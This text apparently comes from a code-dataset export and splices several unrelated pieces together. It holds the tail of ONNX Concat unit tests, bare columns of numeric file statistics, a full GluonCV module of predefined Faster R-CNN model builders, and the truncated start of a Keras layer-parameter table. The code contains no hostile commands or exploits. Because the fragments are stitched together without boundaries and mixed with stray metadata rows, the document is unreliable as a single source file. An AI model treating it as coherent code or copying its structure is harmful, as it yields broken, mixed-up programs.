assert len(results) == 1
result = results[0]
y = np.array([[1, 2, 5, 6], [3, 4, 7, 8]], dtype=np.float32)
assert np.all(result == y)
op = Concat([x0, x1], -1)
onnx_model = convert(OperationGraph([op]))
results = onnxruntime.backend.run(onnx_model, [])
assert len(results) == 1
result = results[0]
y = np.array([[1, 2, 5, 6], [3, 4, 7, 8]], dtype=np.float32)
assert np.all(result == y)
op = Concat([x0, x1], -2)
onnx_model = convert(OperationGraph([op]))
results = onnxruntime.backend.run(onnx_model, [])
assert len(results) == 1
result = results[0]
y = np.array([[1, 2], [3, 4], [5, 6], [7, 8]], dtype=np.float32)
assert np.all(result == y)
def test_Concat_3d():
x0 = np.array([[[1, 2], [3, 4]], [[5, 6], [7, 8]]], dtype=np.float32)
x1 = np.array([[[9, 10], [11, 12]], [[13, 14], [15, 16]]], dtype=np.float32)
op = Concat([x0, x1], 0)
onnx_model = convert(OperationGraph([op]))
results = onnxruntime.backend.run(onnx_model, [])
assert len(results) == 1
result = results[0]
y = np.array(
[[[1, 2], [3, 4]], [[5, 6], [7, 8]], [[9, 10], [11, 12]], [[13, 14], [15, 16]]],
dtype=np.float32,
)
assert np.all(result == y)
op = Concat([x0, x1], 1)
onnx_model = convert(OperationGraph([op]))
results = onnxruntime.backend.run(onnx_model, [])
assert len(results) == 1
result = results[0]
y = np.array(
[[[1, 2], [3, 4], [9, 10], [11, 12]], [[5, 6], [7, 8], [13, 14], [15, 16]]],
dtype=np.float32,
)
assert np.all(result == y)
op = Concat([x0, x1], 2)
onnx_model = convert(OperationGraph([op]))
results = onnxruntime.backend.run(onnx_model, [])
assert len(results) == 1
result = results[0]
y = np.array(
[[[1, 2, 9, 10], [3, 4, 11, 12]], [[5, 6, 13, 14], [7, 8, 15, 16]]],
dtype=np.float32,
)
assert np.all(result == y)
op = Concat([x0, x1], -1)
onnx_model = convert(OperationGraph([op]))
results = onnxruntime.backend.run(onnx_model, [])
assert len(results) == 1
result = results[0]
y = np.array(
[[[1, 2, 9, 10], [3, 4, 11, 12]], [[5, 6, 13, 14], [7, 8, 15, 16]]],
dtype=np.float32,
)
assert np.all(result == y)
op = Concat([x0, x1], -2)
onnx_model = convert(OperationGraph([op]))
results = onnxruntime.backend.run(onnx_model, [])
assert len(results) == 1
result = results[0]
y = np.array(
[[[1, 2], [3, 4], [9, 10], [11, 12]], [[5, 6], [7, 8], [13, 14], [15, 16]]],
dtype=np.float32,
)
assert np.all(result == y)
op = Concat([x0, x1], -3)
onnx_model = convert(OperationGraph([op]))
results = onnxruntime.backend.run(onnx_model, [])
assert len(results) == 1
result = results[0]
y = np.array(
[[[1, 2], [3, 4]], [[5, 6], [7, 8]], [[9, 10], [11, 12]], [[13, 14], [15, 16]]],
dtype=np.float32,
)
assert np.all(result == y)
| 27.017937
| 88
| 0.558008
| 920
| 6,025
| 3.588043
| 0.068478
| 0.087246
| 0.076341
| 0.14541
| 0.962739
| 0.9588
| 0.94638
| 0.943956
| 0.936686
| 0.921539
| 0
| 0.107353
| 0.239336
| 6,025
| 222
| 89
| 27.13964
| 0.612917
| 0
| 0
| 0.805031
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.201258
| 1
| 0.044025
| false
| 0
| 0.025157
| 0
| 0.069182
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c0013262202fd4a1674f576fe3efcc747907a571
| 28,315
|
py
|
Python
|
gluoncv/model_zoo/rcnn/faster_rcnn/predefined_models.py
|
aptsunny/gluon-cv
|
7f050d3411b1ada7d2b9515d63b848c55139fdbb
|
[
"Apache-2.0"
] | 1
|
2020-03-18T04:19:26.000Z
|
2020-03-18T04:19:26.000Z
|
gluoncv/model_zoo/rcnn/faster_rcnn/predefined_models.py
|
aptsunny/gluon-cv
|
7f050d3411b1ada7d2b9515d63b848c55139fdbb
|
[
"Apache-2.0"
] | null | null | null |
gluoncv/model_zoo/rcnn/faster_rcnn/predefined_models.py
|
aptsunny/gluon-cv
|
7f050d3411b1ada7d2b9515d63b848c55139fdbb
|
[
"Apache-2.0"
] | null | null | null |
"""Predefined Faster RCNN Model."""
from __future__ import absolute_import
import warnings
import mxnet as mx
from mxnet.gluon import nn
from mxnet.gluon.contrib.nn import SyncBatchNorm
from ..faster_rcnn import get_faster_rcnn
from ....nn.feature import FPNFeatureExpander
__all__ = ['faster_rcnn_resnet50_v1b_voc',
'faster_rcnn_resnet50_v1b_coco',
'faster_rcnn_fpn_resnet50_v1b_coco',
'faster_rcnn_fpn_syncbn_resnet50_v1b_coco',
'faster_rcnn_resnet50_v1b_custom',
'faster_rcnn_resnet101_v1d_voc',
'faster_rcnn_resnet101_v1d_coco',
'faster_rcnn_fpn_resnet101_v1d_coco',
'faster_rcnn_fpn_syncbn_resnet101_v1d_coco',
'faster_rcnn_resnet101_v1d_custom']
def faster_rcnn_resnet50_v1b_voc(pretrained=False, pretrained_base=True, **kwargs):
r"""Faster RCNN model from the paper
"Ren, S., He, K., Girshick, R., & Sun, J. (2015). Faster r-cnn: Towards
real-time object detection with region proposal networks"
Parameters
----------
pretrained : bool or str
Boolean value controls whether to load the default pretrained weights for model.
String value represents the hashtag for a certain version of pretrained weights.
pretrained_base : bool or str, optional, default is True
Load pretrained base network, the extra layers are randomized. Note that
if pretrained is `True`, this has no effect.
ctx : Context, default CPU
The context in which to load the pretrained weights.
root : str, default '~/.mxnet/models'
Location for keeping the model parameters.
Examples
--------
>>> model = get_faster_rcnn_resnet50_v1b_voc(pretrained=True)
>>> print(model)
"""
from ....model_zoo.resnetv1b import resnet50_v1b
from ....data import VOCDetection
classes = VOCDetection.CLASSES
pretrained_base = False if pretrained else pretrained_base
base_network = resnet50_v1b(pretrained=pretrained_base, dilated=False,
use_global_stats=True, **kwargs)
features = nn.HybridSequential()
top_features = nn.HybridSequential()
for layer in ['conv1', 'bn1', 'relu', 'maxpool', 'layer1', 'layer2', 'layer3']:
features.add(getattr(base_network, layer))
for layer in ['layer4']:
top_features.add(getattr(base_network, layer))
train_patterns = '|'.join(['.*dense', '.*rpn', '.*down(2|3|4)_conv', '.*layers(2|3|4)_conv'])
return get_faster_rcnn(
name='resnet50_v1b', dataset='voc', pretrained=pretrained,
features=features, top_features=top_features, classes=classes,
short=600, max_size=1000, train_patterns=train_patterns,
nms_thresh=0.3, nms_topk=400, post_nms=100,
roi_mode='align', roi_size=(14, 14), strides=16, clip=None,
rpn_channel=1024, base_size=16, scales=(2, 4, 8, 16, 32),
ratios=(0.5, 1, 2), alloc_size=(128, 128), rpn_nms_thresh=0.7,
rpn_train_pre_nms=12000, rpn_train_post_nms=2000,
rpn_test_pre_nms=6000, rpn_test_post_nms=300, rpn_min_size=16,
num_sample=128, pos_iou_thresh=0.5, pos_ratio=0.25, max_num_gt=100,
**kwargs)
def faster_rcnn_resnet50_v1b_coco(pretrained=False, pretrained_base=True, **kwargs):
r"""Faster RCNN model from the paper
"Ren, S., He, K., Girshick, R., & Sun, J. (2015). Faster r-cnn: Towards
real-time object detection with region proposal networks"
Parameters
----------
pretrained : bool or str
Boolean value controls whether to load the default pretrained weights for model.
String value represents the hashtag for a certain version of pretrained weights.
pretrained_base : bool or str, optional, default is True
Load pretrained base network, the extra layers are randomized. Note that
if pretrained is `True`, this has no effect.
ctx : Context, default CPU
The context in which to load the pretrained weights.
root : str, default '~/.mxnet/models'
Location for keeping the model parameters.
Examples
--------
>>> model = get_faster_rcnn_resnet50_v1b_coco(pretrained=True)
>>> print(model)
"""
from ....model_zoo.resnetv1b import resnet50_v1b
from ....data import COCODetection
classes = COCODetection.CLASSES
pretrained_base = False if pretrained else pretrained_base
base_network = resnet50_v1b(pretrained=pretrained_base, dilated=False,
use_global_stats=True, **kwargs)
features = nn.HybridSequential()
top_features = nn.HybridSequential()
for layer in ['conv1', 'bn1', 'relu', 'maxpool', 'layer1', 'layer2', 'layer3']:
features.add(getattr(base_network, layer))
for layer in ['layer4']:
top_features.add(getattr(base_network, layer))
train_patterns = '|'.join(['.*dense', '.*rpn', '.*down(2|3|4)_conv', '.*layers(2|3|4)_conv'])
return get_faster_rcnn(
name='resnet50_v1b', dataset='coco', pretrained=pretrained,
features=features, top_features=top_features, classes=classes,
short=800, max_size=1333, train_patterns=train_patterns,
nms_thresh=0.5, nms_topk=-1, post_nms=-1,
roi_mode='align', roi_size=(14, 14), strides=16, clip=4.14,
rpn_channel=1024, base_size=16, scales=(2, 4, 8, 16, 32),
ratios=(0.5, 1, 2), alloc_size=(128, 128), rpn_nms_thresh=0.7,
rpn_train_pre_nms=12000, rpn_train_post_nms=2000,
rpn_test_pre_nms=6000, rpn_test_post_nms=1000, rpn_min_size=1,
num_sample=128, pos_iou_thresh=0.5, pos_ratio=0.25,
max_num_gt=100, **kwargs)
def faster_rcnn_fpn_resnet50_v1b_coco(pretrained=False, pretrained_base=True, **kwargs):
r"""Faster RCNN model with FPN from the paper
"Ren, S., He, K., Girshick, R., & Sun, J. (2015). Faster r-cnn: Towards
real-time object detection with region proposal networks"
"Lin, T., Dollar, P., Girshick, R., He, K., Hariharan, B., Belongie, S. (2016).
Feature Pyramid Networks for Object Detection"
Parameters
----------
pretrained : bool or str
Boolean value controls whether to load the default pretrained weights for model.
String value represents the hashtag for a certain version of pretrained weights.
pretrained_base : bool or str, optional, default is True
Load pretrained base network, the extra layers are randomized. Note that
if pretrained is `Ture`, this has no effect.
ctx : Context, default CPU
The context in which to load the pretrained weights.
root : str, default '~/.mxnet/models'
Location for keeping the model parameters.
Examples
--------
>>> model = get_faster_rcnn_fpn_resnet50_v1b_coco(pretrained=True)
>>> print(model)
"""
from ....model_zoo.resnetv1b import resnet50_v1b
from ....data import COCODetection
classes = COCODetection.CLASSES
pretrained_base = False if pretrained else pretrained_base
base_network = resnet50_v1b(pretrained=pretrained_base, dilated=False,
use_global_stats=True, **kwargs)
features = FPNFeatureExpander(
network=base_network,
outputs=['layers1_relu8_fwd', 'layers2_relu11_fwd', 'layers3_relu17_fwd',
'layers4_relu8_fwd'], num_filters=[256, 256, 256, 256], use_1x1=True,
use_upsample=True, use_elewadd=True, use_p6=True, no_bias=False, pretrained=pretrained_base)
top_features = None
# 2 FC layer before RCNN cls and reg
box_features = nn.HybridSequential()
for _ in range(2):
box_features.add(nn.Dense(1024, weight_initializer=mx.init.Normal(0.01)))
box_features.add(nn.Activation('relu'))
train_patterns = '|'.join(
['.*dense', '.*rpn', '.*down(2|3|4)_conv', '.*layers(2|3|4)_conv', 'P'])
return get_faster_rcnn(
name='fpn_resnet50_v1b', dataset='coco', pretrained=pretrained, features=features,
top_features=top_features, classes=classes, box_features=box_features,
short=800, max_size=1333, min_stage=2, max_stage=6, train_patterns=train_patterns,
nms_thresh=0.5, nms_topk=-1, post_nms=-1, roi_mode='align', roi_size=(7, 7),
strides=(4, 8, 16, 32, 64), clip=4.14, rpn_channel=1024, base_size=16,
scales=(2, 4, 8, 16, 32), ratios=(0.5, 1, 2), alloc_size=(384, 384),
rpn_nms_thresh=0.7, rpn_train_pre_nms=12000, rpn_train_post_nms=2000,
rpn_test_pre_nms=6000, rpn_test_post_nms=1000, rpn_min_size=1, num_sample=512,
pos_iou_thresh=0.5, pos_ratio=0.25, max_num_gt=100, **kwargs)
def faster_rcnn_fpn_syncbn_resnet50_v1b_coco(pretrained=False, pretrained_base=True, num_devices=0,
**kwargs):
r"""Faster RCNN model with FPN from the paper
"Ren, S., He, K., Girshick, R., & Sun, J. (2015). Faster r-cnn: Towards
real-time object detection with region proposal networks"
"Lin, T., Dollar, P., Girshick, R., He, K., Hariharan, B., Belongie, S. (2016).
Feature Pyramid Networks for Object Detection"
Parameters
----------
pretrained : bool or str
Boolean value controls whether to load the default pretrained weights for model.
String value represents the hashtag for a certain version of pretrained weights.
pretrained_base : bool or str, optional, default is True
Load pretrained base network, the extra layers are randomized. Note that
if pretrained is `Ture`, this has no effect.
num_devices : int, default is 0
Number of devices for sync batch norm layer. if less than 1, use all devices available.
ctx : Context, default CPU
The context in which to load the pretrained weights.
root : str, default '~/.mxnet/models'
Location for keeping the model parameters.
Examples
--------
>>> model = get_faster_rcnn_fpn_syncbn_resnet50_v1b_coco(pretrained=True)
>>> print(model)
"""
from ....model_zoo.resnetv1b import resnet50_v1b
from ....data import COCODetection
classes = COCODetection.CLASSES
pretrained_base = False if pretrained else pretrained_base
gluon_norm_kwargs = {'num_devices': num_devices} if num_devices >= 1 else {}
base_network = resnet50_v1b(pretrained=pretrained_base, dilated=False, use_global_stats=False,
norm_layer=SyncBatchNorm, norm_kwargs=gluon_norm_kwargs, **kwargs)
sym_norm_kwargs = {'ndev': num_devices} if num_devices >= 1 else {}
features = FPNFeatureExpander(
network=base_network,
outputs=['layers1_relu8_fwd', 'layers2_relu11_fwd', 'layers3_relu17_fwd',
'layers4_relu8_fwd'], num_filters=[256, 256, 256, 256], use_1x1=True,
use_upsample=True, use_elewadd=True, use_p6=True, no_bias=True, pretrained=pretrained_base,
norm_layer=mx.sym.contrib.SyncBatchNorm, norm_kwargs=sym_norm_kwargs)
top_features = None
# 1 Conv 1 FC layer before RCNN cls and reg
box_features = nn.HybridSequential()
box_features.add(nn.Conv2D(256, 3, padding=1, use_bias=False),
SyncBatchNorm(**gluon_norm_kwargs),
nn.Activation('relu'),
nn.Dense(1024, weight_initializer=mx.init.Normal(0.01)),
nn.Activation('relu'))
train_patterns = '(?!.*moving)' # excluding symbol bn moving mean and var
return get_faster_rcnn(
name='fpn_syncbn_resnet50_v1b', dataset='coco', pretrained=pretrained, features=features,
top_features=top_features, classes=classes, box_features=box_features,
short=(640, 800), max_size=1333, min_stage=2, max_stage=6, train_patterns=train_patterns,
nms_thresh=0.5, nms_topk=-1, post_nms=-1, roi_mode='align', roi_size=(7, 7),
strides=(4, 8, 16, 32, 64), clip=4.14, rpn_channel=256, base_size=16,
scales=(2, 4, 8, 16, 32), ratios=(0.5, 1, 2), alloc_size=(384, 384),
rpn_nms_thresh=0.7, rpn_train_pre_nms=12000, rpn_train_post_nms=2000,
rpn_test_pre_nms=6000, rpn_test_post_nms=1000, rpn_min_size=1, num_sample=512,
pos_iou_thresh=0.5, pos_ratio=0.25, max_num_gt=100, **kwargs)
def faster_rcnn_resnet50_v1b_custom(classes, transfer=None, pretrained_base=True,
pretrained=False, **kwargs):
r"""Faster RCNN model with resnet50_v1b base network on custom dataset.
Parameters
----------
classes : iterable of str
Names of custom foreground classes. `len(classes)` is the number of foreground classes.
transfer : str or None
If not `None`, will try to reuse pre-trained weights from faster RCNN networks trained
on other datasets.
pretrained : bool or str
Boolean value controls whether to load the default pretrained weights for model.
String value represents the hashtag for a certain version of pretrained weights.
pretrained_base : bool or str
Boolean value controls whether to load the default pretrained weights for model.
String value represents the hashtag for a certain version of pretrained weights.
ctx : Context, default CPU
The context in which to load the pretrained weights.
root : str, default '~/.mxnet/models'
Location for keeping the model parameters.
Returns
-------
mxnet.gluon.HybridBlock
Hybrid faster RCNN network.
"""
if pretrained:
warnings.warn("Custom models don't provide `pretrained` weights, ignored.")
if transfer is None:
from ....model_zoo.resnetv1b import resnet50_v1b
base_network = resnet50_v1b(pretrained=pretrained_base, dilated=False,
use_global_stats=True, **kwargs)
features = nn.HybridSequential()
top_features = nn.HybridSequential()
for layer in ['conv1', 'bn1', 'relu', 'maxpool', 'layer1', 'layer2', 'layer3']:
features.add(getattr(base_network, layer))
for layer in ['layer4']:
top_features.add(getattr(base_network, layer))
train_patterns = '|'.join(['.*dense', '.*rpn', '.*down(2|3|4)_conv',
'.*layers(2|3|4)_conv'])
return get_faster_rcnn(
name='resnet50_v1b', dataset='custom', pretrained=pretrained,
features=features, top_features=top_features, classes=classes,
train_patterns=train_patterns, **kwargs)
else:
from ...model_zoo import get_model
net = get_model('faster_rcnn_resnet50_v1b_' + str(transfer), pretrained=True, **kwargs)
reuse_classes = [x for x in classes if x in net.classes]
net.reset_class(classes, reuse_weights=reuse_classes)
return net
def faster_rcnn_resnet101_v1d_voc(pretrained=False, pretrained_base=True, **kwargs):
r"""Faster RCNN model from the paper
"Ren, S., He, K., Girshick, R., & Sun, J. (2015). Faster r-cnn: Towards
real-time object detection with region proposal networks"
Parameters
----------
pretrained : bool, optional, default is False
Load pretrained weights.
pretrained_base : bool or str, optional, default is True
Load pretrained base network, the extra layers are randomized. Note that
if pretrained is `True`, this has no effect.
ctx : Context, default CPU
The context in which to load the pretrained weights.
root : str, default '~/.mxnet/models'
Location for keeping the model parameters.
Examples
--------
>>> model = get_faster_rcnn_resnet101_v1d_voc(pretrained=True)
>>> print(model)
"""
from ....model_zoo.resnetv1b import resnet101_v1d
from ....data import VOCDetection
classes = VOCDetection.CLASSES
pretrained_base = False if pretrained else pretrained_base
base_network = resnet101_v1d(pretrained=pretrained_base, dilated=False,
use_global_stats=True, **kwargs)
features = nn.HybridSequential()
top_features = nn.HybridSequential()
for layer in ['conv1', 'bn1', 'relu', 'maxpool', 'layer1', 'layer2', 'layer3']:
features.add(getattr(base_network, layer))
for layer in ['layer4']:
top_features.add(getattr(base_network, layer))
train_patterns = '|'.join(['.*dense', '.*rpn', '.*down(2|3|4)_conv', '.*layers(2|3|4)_conv'])
return get_faster_rcnn(
name='resnet101_v1d', dataset='voc', pretrained=pretrained,
features=features, top_features=top_features, classes=classes,
short=600, max_size=1000, train_patterns=train_patterns,
nms_thresh=0.3, nms_topk=400, post_nms=100,
roi_mode='align', roi_size=(14, 14), strides=16, clip=None,
rpn_channel=1024, base_size=16, scales=(2, 4, 8, 16, 32),
ratios=(0.5, 1, 2), alloc_size=(128, 128), rpn_nms_thresh=0.7,
rpn_train_pre_nms=12000, rpn_train_post_nms=2000,
rpn_test_pre_nms=6000, rpn_test_post_nms=300, rpn_min_size=16,
num_sample=128, pos_iou_thresh=0.5, pos_ratio=0.25, max_num_gt=100,
**kwargs)
def faster_rcnn_resnet101_v1d_coco(pretrained=False, pretrained_base=True, **kwargs):
r"""Faster RCNN model from the paper
"Ren, S., He, K., Girshick, R., & Sun, J. (2015). Faster r-cnn: Towards
real-time object detection with region proposal networks"
Parameters
----------
pretrained : bool, optional, default is False
Load pretrained weights.
pretrained_base : bool or str, optional, default is True
Load pretrained base network, the extra layers are randomized. Note that
if pretrained is `True`, this has no effect.
ctx : Context, default CPU
The context in which to load the pretrained weights.
root : str, default '~/.mxnet/models'
Location for keeping the model parameters.
Examples
--------
>>> model = get_faster_rcnn_resnet101_v1d_coco(pretrained=True)
>>> print(model)
"""
from ....model_zoo.resnetv1b import resnet101_v1d
from ....data import COCODetection
classes = COCODetection.CLASSES
pretrained_base = False if pretrained else pretrained_base
base_network = resnet101_v1d(pretrained=pretrained_base, dilated=False,
use_global_stats=True, **kwargs)
features = nn.HybridSequential()
top_features = nn.HybridSequential()
for layer in ['conv1', 'bn1', 'relu', 'maxpool', 'layer1', 'layer2', 'layer3']:
features.add(getattr(base_network, layer))
for layer in ['layer4']:
top_features.add(getattr(base_network, layer))
train_patterns = '|'.join(['.*dense', '.*rpn', '.*down(2|3|4)_conv', '.*layers(2|3|4)_conv'])
return get_faster_rcnn(
name='resnet101_v1d', dataset='coco', pretrained=pretrained,
features=features, top_features=top_features, classes=classes,
short=800, max_size=1333, train_patterns=train_patterns,
nms_thresh=0.5, nms_topk=-1, post_nms=-1,
roi_mode='align', roi_size=(14, 14), strides=16, clip=4.14,
rpn_channel=1024, base_size=16, scales=(2, 4, 8, 16, 32),
ratios=(0.5, 1, 2), alloc_size=(128, 128), rpn_nms_thresh=0.7,
rpn_train_pre_nms=12000, rpn_train_post_nms=2000,
rpn_test_pre_nms=6000, rpn_test_post_nms=1000, rpn_min_size=1,
num_sample=128, pos_iou_thresh=0.5, pos_ratio=0.25, max_num_gt=100,
**kwargs)
def faster_rcnn_fpn_resnet101_v1d_coco(pretrained=False, pretrained_base=True, **kwargs):
r"""Faster RCNN model with FPN from the paper
"Ren, S., He, K., Girshick, R., & Sun, J. (2015). Faster r-cnn: Towards
real-time object detection with region proposal networks"
"Lin, T., Dollar, P., Girshick, R., He, K., Hariharan, B., Belongie, S. (2016).
Feature Pyramid Networks for Object Detection"
Parameters
----------
pretrained : bool or str
Boolean value controls whether to load the default pretrained weights for model.
String value represents the hashtag for a certain version of pretrained weights.
pretrained_base : bool or str, optional, default is True
Load pretrained base network, the extra layers are randomized. Note that
if pretrained is `Ture`, this has no effect.
ctx : Context, default CPU
The context in which to load the pretrained weights.
root : str, default '~/.mxnet/models'
Location for keeping the model parameters.
Examples
--------
>>> model = get_faster_rcnn_fpn_resnet101_v1d_coco(pretrained=True)
>>> print(model)
"""
from ....model_zoo.resnetv1b import resnet101_v1d
from ....data import COCODetection
classes = COCODetection.CLASSES
pretrained_base = False if pretrained else pretrained_base
base_network = resnet101_v1d(pretrained=pretrained_base, dilated=False,
use_global_stats=True, **kwargs)
features = FPNFeatureExpander(
network=base_network,
outputs=['layers1_relu8_fwd', 'layers2_relu11_fwd', 'layers3_relu68_fwd',
'layers4_relu8_fwd'], num_filters=[256, 256, 256, 256], use_1x1=True,
use_upsample=True, use_elewadd=True, use_p6=True, no_bias=False, pretrained=pretrained_base)
top_features = None
# 2 FC layer before RCNN cls and reg
box_features = nn.HybridSequential()
for _ in range(2):
box_features.add(nn.Dense(1024, weight_initializer=mx.init.Normal(0.01)))
box_features.add(nn.Activation('relu'))
train_patterns = '|'.join(
['.*dense', '.*rpn', '.*down(2|3|4)_conv', '.*layers(2|3|4)_conv', 'P'])
return get_faster_rcnn(
name='fpn_resnet101_v1d', dataset='coco', pretrained=pretrained, features=features,
top_features=top_features, classes=classes, box_features=box_features,
short=800, max_size=1333, min_stage=2, max_stage=6, train_patterns=train_patterns,
nms_thresh=0.5, nms_topk=-1, post_nms=-1, roi_mode='align', roi_size=(7, 7),
strides=(4, 8, 16, 32, 64), clip=4.14, rpn_channel=1024, base_size=16,
scales=(2, 4, 8, 16, 32), ratios=(0.5, 1, 2), alloc_size=(384, 384),
rpn_nms_thresh=0.7, rpn_train_pre_nms=12000, rpn_train_post_nms=2000,
rpn_test_pre_nms=6000, rpn_test_post_nms=1000, rpn_min_size=1, num_sample=512,
pos_iou_thresh=0.5, pos_ratio=0.25, max_num_gt=100, **kwargs)
def faster_rcnn_fpn_syncbn_resnet101_v1d_coco(pretrained=False, pretrained_base=True, num_devices=0,
**kwargs):
r"""Faster RCNN model with FPN from the paper
"Ren, S., He, K., Girshick, R., & Sun, J. (2015). Faster r-cnn: Towards
real-time object detection with region proposal networks"
"Lin, T., Dollar, P., Girshick, R., He, K., Hariharan, B., Belongie, S. (2016).
Feature Pyramid Networks for Object Detection"
Parameters
----------
pretrained : bool or str
Boolean value controls whether to load the default pretrained weights for model.
String value represents the hashtag for a certain version of pretrained weights.
pretrained_base : bool or str, optional, default is True
Load pretrained base network, the extra layers are randomized. Note that
if pretrained is `Ture`, this has no effect.
num_devices : int, default is 0
Number of devices for sync batch norm layer. if less than 1, use all devices available.
ctx : Context, default CPU
The context in which to load the pretrained weights.
root : str, default '~/.mxnet/models'
Location for keeping the model parameters.
Examples
--------
>>> model = get_faster_rcnn_fpn_syncbn_resnet101_v1d_coco(pretrained=True)
>>> print(model)
"""
from ....model_zoo.resnetv1b import resnet101_v1d
from ....data import COCODetection
classes = COCODetection.CLASSES
pretrained_base = False if pretrained else pretrained_base
gluon_norm_kwargs = {'num_devices': num_devices} if num_devices >= 1 else {}
base_network = resnet101_v1d(pretrained=pretrained_base, dilated=False, use_global_stats=False,
norm_layer=SyncBatchNorm, norm_kwargs=gluon_norm_kwargs, **kwargs)
sym_norm_kwargs = {'ndev': num_devices} if num_devices >= 1 else {}
features = FPNFeatureExpander(
network=base_network,
outputs=['layers1_relu8_fwd', 'layers2_relu11_fwd', 'layers3_relu68_fwd',
'layers4_relu8_fwd'], num_filters=[256, 256, 256, 256], use_1x1=True,
use_upsample=True, use_elewadd=True, use_p6=True, no_bias=True, pretrained=pretrained_base,
norm_layer=mx.sym.contrib.SyncBatchNorm, norm_kwargs=sym_norm_kwargs)
top_features = None
# 1 Conv 1 FC layer before RCNN cls and reg
box_features = nn.HybridSequential()
for _ in range(4):
box_features.add(nn.Conv2D(256, 3, padding=1, use_bias=False),
SyncBatchNorm(**gluon_norm_kwargs),
nn.Activation('relu'))
box_features.add(nn.Dense(1024, weight_initializer=mx.init.Normal(0.01)),
nn.Activation('relu'))
train_patterns = '(?!.*moving)' # excluding symbol bn moving mean and var
return get_faster_rcnn(
name='fpn_syncbn_resnet101_v1d', dataset='coco', pretrained=pretrained, features=features,
top_features=top_features, classes=classes, box_features=box_features,
short=(640, 800), max_size=1333, min_stage=2, max_stage=6, train_patterns=train_patterns,
nms_thresh=0.5, nms_topk=-1, post_nms=-1, roi_mode='align', roi_size=(7, 7),
strides=(4, 8, 16, 32, 64), clip=4.14, rpn_channel=256, base_size=16,
scales=(2, 4, 8, 16, 32), ratios=(0.5, 1, 2), alloc_size=(384, 384),
rpn_nms_thresh=0.7, rpn_train_pre_nms=12000, rpn_train_post_nms=2000,
rpn_test_pre_nms=6000, rpn_test_post_nms=1000, rpn_min_size=1, num_sample=512,
pos_iou_thresh=0.5, pos_ratio=0.25, max_num_gt=100, **kwargs)
def faster_rcnn_resnet101_v1d_custom(classes, transfer=None, pretrained_base=True,
pretrained=False, **kwargs):
r"""Faster RCNN model with resnet101_v1d base network on custom dataset.
Parameters
----------
classes : iterable of str
Names of custom foreground classes. `len(classes)` is the number of foreground classes.
transfer : str or None
If not `None`, will try to reuse pre-trained weights from faster RCNN networks trained
on other datasets.
pretrained_base : bool or str
Boolean value controls whether to load the default pretrained weights for model.
String value represents the hashtag for a certain version of pretrained weights.
ctx : Context, default CPU
The context in which to load the pretrained weights.
root : str, default '~/.mxnet/models'
Location for keeping the model parameters.
Returns
-------
mxnet.gluon.HybridBlock
Hybrid faster RCNN network.
"""
if pretrained:
warnings.warn("Custom models don't provide `pretrained` weights, ignored.")
if transfer is None:
from ....model_zoo.resnetv1b import resnet101_v1d
base_network = resnet101_v1d(pretrained=pretrained_base, dilated=False,
use_global_stats=True, **kwargs)
features = nn.HybridSequential()
top_features = nn.HybridSequential()
for layer in ['conv1', 'bn1', 'relu', 'maxpool', 'layer1', 'layer2', 'layer3']:
features.add(getattr(base_network, layer))
for layer in ['layer4']:
top_features.add(getattr(base_network, layer))
train_patterns = '|'.join(['.*dense', '.*rpn', '.*down(2|3|4)_conv',
'.*layers(2|3|4)_conv'])
return get_faster_rcnn(
name='resnet101_v1d', dataset='custom', pretrained=pretrained,
features=features, top_features=top_features, classes=classes,
train_patterns=train_patterns, **kwargs)
else:
from ....model_zoo import get_model
net = get_model('faster_rcnn_resnet101_v1d_' + str(transfer), pretrained=True, **kwargs)
reuse_classes = [x for x in classes if x in net.classes]
net.reset_class(classes, reuse_weights=reuse_classes)
return net
| 49.938272
| 100
| 0.671446
| 3,821
| 28,315
| 4.766292
| 0.071971
| 0.044586
| 0.020865
| 0.00615
| 0.985284
| 0.978146
| 0.970953
| 0.965902
| 0.964639
| 0.964639
| 0
| 0.051493
| 0.218118
| 28,315
| 566
| 101
| 50.026502
| 0.771128
| 0.3276
| 0
| 0.809677
| 0
| 0
| 0.096772
| 0.023408
| 0
| 0
| 0
| 0
| 0
| 1
| 0.032258
| false
| 0
| 0.087097
| 0
| 0.158065
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c04633a61e9e6ceb7163f805b7867cd05afc285c
| 27,812
|
py
|
Python
|
apps/layers_dataset/layers_param_data.py
|
new-TonyWang/tvm
|
6b9f0abf935cbed82480326460eaaeb1a95bf9ca
|
[
"Zlib",
"Unlicense",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0"
] | null | null | null |
apps/layers_dataset/layers_param_data.py
|
new-TonyWang/tvm
|
6b9f0abf935cbed82480326460eaaeb1a95bf9ca
|
[
"Zlib",
"Unlicense",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0"
] | null | null | null |
apps/layers_dataset/layers_param_data.py
|
new-TonyWang/tvm
|
6b9f0abf935cbed82480326460eaaeb1a95bf9ca
|
[
"Zlib",
"Unlicense",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0"
] | null | null | null |
from generate_param_value import *
"""
保存了所有算子的参数和其值的生成函数的对应关系,如果不需要增加新算子则不需要修改
"""
global_table={
'LeakyReLU': {'self': None,
'alpha': get_value,
'kwargs': None},
'PReLU': {'self': None,
'alpha_initializer': 'zeros',
'alpha_regularizer': None,
'alpha_constraint': None,
'shared_axes': get_shared_axes,
'kwargs': None},
'ELU': {'self': None,
'alpha': get_value,#1.0
'kwargs': None},
'ThresholdedReLU': {'self': None,
'theta': get_value,#1.0
'kwargs': None},
'Softmax': {'self': None,
'axis': get_axis,#-1
'kwargs': None},
'Conv1D': {'self': None,
'filters': get_filters,
'kernel_size': kernel_size_dispatch,
'strides': get_stride_or_dilation_rate_pool_size,
'padding': get_padding,
'data_format': get_data_format,
'dilation_rate': get_stride_or_dilation_rate_pool_size,
'groups': get_group,
'activation': get_activation,
'use_bias': get_bool,
'kernel_initializer': 'glorot_uniform',
'bias_initializer': 'zeros',
